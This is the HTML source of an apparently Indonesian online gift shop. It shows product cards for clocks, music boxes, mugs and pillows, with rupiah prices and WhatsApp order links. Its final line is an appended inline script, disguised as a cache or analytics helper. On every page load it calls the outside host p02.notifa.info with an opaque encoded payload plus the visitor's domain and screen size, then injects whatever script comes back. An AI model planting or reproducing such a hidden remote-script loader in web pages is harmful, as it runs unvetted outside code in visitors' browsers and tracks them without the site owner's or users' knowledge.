<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <!-- The above 4 meta tags *must* come first in the head; any other head content must come *after* these tags-->
    <!-- Title-->
    <title>Udah Kadoin Aja! | Kado Untuk Semua Orang</title>
    <!-- Favicon-->
    <link rel="icon" href="img/core-img/favicon.png">
    <!-- Stylesheet-->
    <link rel="stylesheet" href="style.css">
  </head>
  <body>
    <!-- Preloader-->
    <div class="preloader" id="preloader">
      <div class="spinner-grow text-secondary" role="status">
        <div class="sr-only">Loading...</div>
      </div>
    </div>
    <!-- Header Area-->
    <div class="header-area" id="headerArea">
      <div class="container h-100 d-flex align-items-center justify-content-between">
        <!-- Logo Wrapper-->
        <div class="logo-wrapper"><a href="index.html"><img src="img/core-img/logo-small.png" alt=""></a></div>
        <!-- Search Form-->
        <div class="top-search-form">
          <form action="" method="POST">
            <input class="form-control" type="search" placeholder="Kado Ulang Tahun">
            <button type="submit"><i class="fa fa-search"></i></button>
          </form>
        </div>
        <!-- Navbar Toggler-->
        <a href="keranjang.html"><i class='lni lni-shopping-basket'></i></a>
       
    </div>
    </div>
    <!-- Sidenav Black Overlay-->
    <div class="page-content-wrapper">
      <!-- Hero Slides-->
      <div class="hero-slides owl-carousel">
        <div class="single-hero-slide">
          <div class="slide-img"><img src="img/bg-img/3.jpg" alt=""></div>
          <div class="slide-content h-100 d-flex align-items-center">
            <div class="container">
              </br>
              </br>
              <h4 class="mb-0 text-dark" data-animation="fadeInUp" data-delay="100ms" data-wow-duration="1000ms">Promo #DiRumahAja</h4>
              <p data-animation="fadeInUp" data-delay="400ms" data-wow-duration="1000ms">Kamu cukup dirumah saja, biar kami yang buat </br>kadomu.</p><a class="btn btn-danger btn-sm" href="eksplor.html" data-animation="fadeInUp" data-delay="800ms" data-wow-duration="1000ms">Pilih Kadomu</a>
            </div>
          </div>
        </div>
        <!-- Single Hero Slide-->
        <div class="single-hero-slide">
          <div class="slide-img"><img src="img/bg-img/1.jpg" alt=""></div>
          <div class="slide-content h-100 d-flex align-items-center">
            <div class="container">
              <center>
              </br>
              </br>
              </br>
              <h3 class="text-white mb-0" data-animation="fadeInUp" data-delay="100ms" data-wow-duration="1000ms">Wedding Clock</h3>
              <p></p>     
              <a class="btn btn-success btn-sm" href="wedding-clock.html" data-animation="fadeInUp" data-delay="800ms" data-wow-duration="1000ms">Pesan Sekarang</a>
                </center>
            </div>
          </div>
        </div>
        <!-- Single Hero Slide-->
        <div class="single-hero-slide">
          <div class="slide-img"><img src="img/bg-img/2.jpg" alt=""></div>
          <div class="slide-content h-100 d-flex ">
            <div class="container">
              <center>
              <p></p>
              <h4 class="text-white mb-0" data-animation="fadeInUp" data-delay="100ms" data-wow-duration="1000ms">Best Design</h4>
              <p  class="text-white" data-animation="fadeInUp" data-delay="400ms" data-wow-duration="1000ms">Design sesuka hatimu</p><a class="btn btn-success btn-sm" href="bantal-satin.html" data-animation="fadeInUp" data-delay="500ms" data-wow-duration="1000ms">Pilih Kadomu</a>
              </center>
            </div>
          </div>
        </div>
        <!-- Single Hero Slide-->
        
      </div>
     </br>
      <!-- Flash Sale Slide-->
      <div class="flash-sale-wrapper pb-3">
        <div class="container">
            <!-- Flash Sale Slide-->
            <div class="flash-sale-slide owl-carousel">
                <!-- Single Flash Sale Card-->
                <div class="card mb-3 catagory-card">
                    <div class="card-body"><a href="eksplor.html"><i class="lni-gift"></i><span>Kado Pernikahan</span></a></div>
                </div>
                <!-- Single Flash Sale Card-->
                <div class="card mb-3 catagory-card">
                    <div class="card-body"><a href="eksplor.html"><i class="lni-baloon"></i><span>Kado UlangTahun</span></a></div>
                </div>
                <!-- Single Flash Sale Card-->
                <div class="card mb-3 catagory-card">
                    <div class="card-body"><a href="eksplor.html"><i class="lni-graduation"></i><span>Kado Wisuda</span></a></div>
                </div>
            </div>
        </div>
      </div>


      <!-- Flash Sale Slide-->
      <div class="flash-sale-wrapper pb-3">
        <div class="container">
          <div class="section-heading d-flex align-items-center justify-content-between">
            <h6 class="ml-1">Flash Sale</h6>
            <!-- <a class="btn btn-success btn-sm" href="flash-sale.html">View All</a> -->
          </div>
          <!-- Flash Sale Slide-->
          <div class="flash-sale-slide owl-carousel">
            <!-- Single Flash Sale Card-->
            <div class="card flash-sale-card">
              <div class="card-body"><a href="wooden-music-box.html"><img src="img/product/1.jpg" alt=""><span class="product-title">Wooden Music Box</span>
                  <p class="sale-price">Rp. 238.900<span class="real-price"></span></p><span class="progress-title">169 Terjual</span>
                  <div class="progress">
                    <div class="progress-bar btn-danger" role="progressbar" style="width: 89%" aria-valuenow="89" aria-valuemin="0" aria-valuemax="100"></div>
                  </div></a></div>
            </div>
            <!-- Single Flash Sale Card-->
            <div class="card flash-sale-card">
              <div class="card-body"><a href="wedding-clock.html"><img src="img/product/2.jpg" alt=""><span class="product-title">Wedding Clock</span>
                  <p class="sale-price">Rp. 125.080<span class="real-price"></span></p><span class="progress-title">117 Terjual</span>
                  <div class="progress">
                    <div class="progress-bar" role="progressbar" style="width: 68%" aria-valuenow="68" aria-valuemin="0" aria-valuemax="100"></div>
                  </div></a></div>
            </div>
            <!-- Single Flash Sale Card-->
            <div class="card flash-sale-card">
              <div class="card-body"><a href="family-clock.html"><img src="img/product/3.jpg" alt=""><span class="product-title">Family Clock 40x30</span>
                  <p class="sale-price">Rp. 167.200</p><span class="progress-title">86 Terjual</span>
                  <div class="progress">
                    <div class="progress-bar" role="progressbar" style="width: 53%" aria-valuenow="53" aria-valuemin="0" aria-valuemax="100"></div>
                  </div></a></div>
            </div>
          </div>
        </div>
      </div>
      <!-- Top Products-->
      <div class="top-products-area clearfix">
        <div class="container">
          <div class="section-heading d-flex align-items-center justify-content-between">
            <h6 class="ml-1">Top Products</h6><a class="btn btn-danger btn-sm" href="eksplor.html">View All</a>
          </div>
          <div class="row">
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-danger">-22%</span><a class="wishlist-btn" href="wedding-clock.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="wedding-clock.html"><img class="mb-2" src="img/product/2.jpg" alt=""></a><a class="product-title d-block" href="wedding-clock.html">Wedding Clock</a>
                  <p class="sale-price">Rp. 125.080</p>
                  <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Wedding%20Clock"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-danger">-22%</span><a class="wishlist-btn" href="wedding-clock.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="wedding-clock.html"><img class="mb-2" src="img/product/4.jpg" alt=""></a><a class="product-title d-block" href="wedding-clock.html">Wedding Clock</a>
                    <p class="sale-price">Rp. 125.080</p>
                    <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Wedding%20Clock"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-danger">-8%</span><a class="wishlist-btn" href="acrylic-music-box.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="acrylic-music-box.html"><img class="mb-2" src="img/product/5.jpg" alt=""></a><a class="product-title d-block" href="acrylic-music-box.html">Acrylic Music Box</a>
                    <p class="sale-price">Rp. 248.900</p>
                    <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Acrylic%20Music%20Box"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-success">Best Seller</span><a class="wishlist-btn" href="wooden-music-box.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="wooden-music-box.html"><img class="mb-2" src="img/product/1.jpg" alt=""></a><a class="product-title d-block" href="wooden-music-box.html">Wooden Music Box</a>
                  <p class="sale-price">Rp. 238.900</p>
                  <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Wooden%20Music%20Box"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-danger">-22%</span><a class="wishlist-btn" href="wedding-clock.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="wedding-clock.html"><img class="mb-2" src="img/product/6.jpg" alt=""></a><a class="product-title d-block" href="wedding-clock.html">Graduation Clock</a>
                    <p class="sale-price">Rp. 125.080</p>
                    <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Graduation%20Clock"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-danger">-22%</span><a class="wishlist-btn" href="family-clock.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="family-clock.html"><img class="mb-2" src="img/product/3.jpg" alt=""></a><a class="product-title d-block" href="family-clock.html">Family Clock 40x30</a>
                    <p class="sale-price">Rp. 167.200</p>
                    <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Family%20Clock%2040x30"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <!-- Cool Facts Area-->
      <div class="cta-area">
        <div class="container">
          <div class="cta-text px-4 py-5" style="background-image: url(img/bg-img/6.jpg)">
            <h4>Promo #DiRumahAja</h4>
            <p>Kamu cukup dirumah saja, biar kami yang buat kadomu.</p><a class="btn btn-danger" href="#">Pilih Kadomu</a>
          </div>
        </div>
      </div>
    </br>
      <!-- Top Products-->
      <div class="top-products-area clearfix">
        <div class="container">
          <div class="section-heading d-flex align-items-center justify-content-between">
            <h6 class="ml-1">All Product</h6><a class="btn btn-danger btn-sm" href="eksplor.html">View All</a>
          </div>
          <div class="row">
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-danger">-22%</span><a class="wishlist-btn" href="family-clock2.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="family-clock2.html"><img class="mb-2" src="img/product/8.jpg" alt=""></a><a class="product-title d-block" href="family-clock2.html">Anniversary Clock 30x20</a>
                  <p class="sale-price">Rp. 125.080</p>
                  <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Anniversary%20Clock%2030x20"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-danger">-22%</span><a class="wishlist-btn" href="bantal-satin.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="bantal-satin.html"><img class="mb-2" src="img/product/9.jpg" alt=""></a><a class="product-title d-block" href="bantal-satin.html">Bantal Satin 40x60</a>
                    <p class="sale-price">Rp. 126.640</p>
                    <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Bantal%20Satin%2040x60"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-danger">-30%</span><a class="wishlist-btn" href="3dbox-lamp.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="3dbox-lamp.html"><img class="mb-2" src="img/product/10.jpg" alt=""></a><a class="product-title d-block" href="3dbox-lamp.html">3D Box Lamp Acrylic</a>
                  <p class="sale-price">Rp. 197.340</p>
                  <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%203DBox%20Lamp%20Acrylic"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-danger">-5%</span><a class="wishlist-btn" href="mug-couple.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="mug-couple.html"><img class="mb-2" src="img/product/11.jpg" alt=""></a><a class="product-title d-block" href="mug-couple.html">Mug Couple</a>
                    <p class="sale-price">Rp. 147.250</p>
                    <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Mug%20Couple"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-danger">-5%</span><a class="wishlist-btn" href="mug-single.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="mug-single.html"><img class="mb-2" src="img/product/12.jpg" alt=""></a><a class="product-title d-block" href="mug-single.html">Mug Single</a>
                    <p class="sale-price">Rp. 87.400</p>
                    <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Mug%20Single"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
            <!-- Single Top Product Card-->
            <div class="col-6 col-sm-4">
              <div class="card top-product-card mb-3">
                <div class="card-body"><span class="badge badge-success">Best Seller</span><a class="wishlist-btn" href="bantal-rasfur.html"><i class="lni-heart-filled"></i></a><a class="product-thumbnail d-block" href="bantal-rasfur.html"><img class="mb-2" src="img/product/13.jpg" alt=""></a><a class="product-title d-block" href="bantal-rasfur.html">Bantal Rasfur 40x60</a>
                    <p class="sale-price">Rp. 97.800</p>
                    <div class="product-rating"><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i><i class="lni-star-filled"></i></div><a class="btn btn-success" href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20Bantal%20Rasfur%2040x60"><i class="lni-whatsapp"></i></a>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    <!-- Footer Nav-->
    <div class="footer-nav-area" id="footerNav">
      <div class="suha-footer-nav h-100">
        <ul class="h-100 d-flex align-items-center justify-content-between">
          <li class="active"><a href="index.html"><i class="lni-home"></i>Home</a></li>
          <li><a href="eksplor.html"><i class="lni-grid-alt"></i>Eksplor</a></li>
          <li><a href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20kado"><i class="lni-whatsapp"></i>Chat</a></li>
          <li><a href="notifikasi.html"><i class="lni-alarm lni-tada-effect"></i>Notifikasi</a></li>
          <li><a href="support.html"><i class="lni-question-circle"></i>Support</a></li>
        </ul>
      </div>
    </div>
    <!-- All JavaScript Files-->
    <script src="js/jquery.min.js"></script>
    <script src="js/popper.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/waypoints.min.js"></script>
    <script src="js/jquery.easing.min.js"></script>
    <script src="js/owl.carousel.min.js"></script>
    <script src="js/jquery.animatedheadline.min.js"></script>
    <script src="js/jquery.counterup.min.js"></script>
    <script src="js/wow.min.js"></script>
    <script src="js/jarallax.min.js"></script>
    <script src="js/jarallax-video.min.js"></script>
    <script src="js/default/jquery.passwordstrength.js"></script>
    <script src="js/default/dark-mode-switch.js"></script>
    <script src="js/default/active.js"></script>
  <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p02.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXPO%2bgXEzZDbXIbxcDADbSaWHYBLAC37yloFB7hvuZz4R8pizHMZQj7g6aNMNu2R%2fUuQBBOPhqYDWPGpZLVEyd6iUQSL7enFlkB7Um445M3CirQkvfeBGu%2bUiQisTR26B8UzI6kha9qem2v%2bx%2fKmAkQUwkVMGbdwQ0gAuIxLmfTXdpMdnlAodqsDihVTppNZYzQ4DGAJvhmIG%2fH%2bJhsQrSLKhMoSuN7X2apNVCdUia4ppBsYjm8QsbtCOfNVmX0%2fHVwVws6wS3a2dDp%2bG%2fN8K0kk5R6l9PEc4w2QWRH9Vi2GvTU4Ol92Sk%2fgjlwR7AUdWTxEdtCXBEzY1%2feQH%2b%2fPqOPaSeuQ1l2CTFCPIfFC1rjJIxLX8e%2fGI5W7bM931iJ34IfbYgpCeERgBB9Cuax1AABJBEOkECDDg8kYHj7AH%2bmKyA%2fPPhPisy4kyAfFQulYX0qbUPrXS7rXQXWqycIM3KPm8%2fpeYcnSrjPOmmIpb0Csk%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>